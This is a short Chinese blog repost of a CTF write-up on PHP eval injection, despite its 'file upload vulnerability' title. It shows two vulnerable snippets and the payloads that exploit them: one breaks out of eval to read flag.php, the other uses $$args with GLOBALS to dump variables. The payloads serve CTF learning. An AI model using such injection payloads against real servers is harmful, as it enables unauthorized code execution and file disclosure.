码迷,mamicode.com
首页 > Web开发 > 详细

典型的文件上传漏洞

时间:2018-12-23 17:52:56      阅读:340      评论:0      收藏:0      [点我收藏+]

标签:int   执行   include   tool   flag   引入   $$   正则   als   

案例一
URL:http://120.24.86.145:8003/
代码

<?php 
include "waf.php"; 
include "flag.php"; 
$a = @$_REQUEST[‘hello‘]; 
eval( "var_dump($a);"); 
show_source(__FILE__); ?>

其实就是拼接eval
可构造如下语句:

1);print_r(file(flag.php));//

到了代码里就是

eval( "var_dump(1);print_r(file(flag.php));//);"); 

案例二

URL:http://120.24.86.145:8004/index1.php

 

flag In the variable ! <?php  


error_reporting(0);// 关闭php错误显示
include "flag1.php";// 引入flag1.php文件代码
highlight_file(__file__);
if(isset($_GET[‘args‘])){// 通过get方式传递 args变量才能执行if里面的代码
    $args = $_GET[‘args‘];
    if(!preg_match("/^\w+$/",$args)){// 这个正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成
        die("args error!");
    }
    eval("var_dump($$args);");// 这边告诉我们这题是代码审计的题目
}
?>

 

这个可以注意一下eval很明显$$.首先他说如果不符合那个正则就die。\w的意思是所有的字母。也就是说$args必须要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");

典型的文件上传漏洞

标签:int   执行   include   tool   flag   引入   $$   正则   als   

原文地址:https://www.cnblogs.com/WhiteHatKevil/p/10164814.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!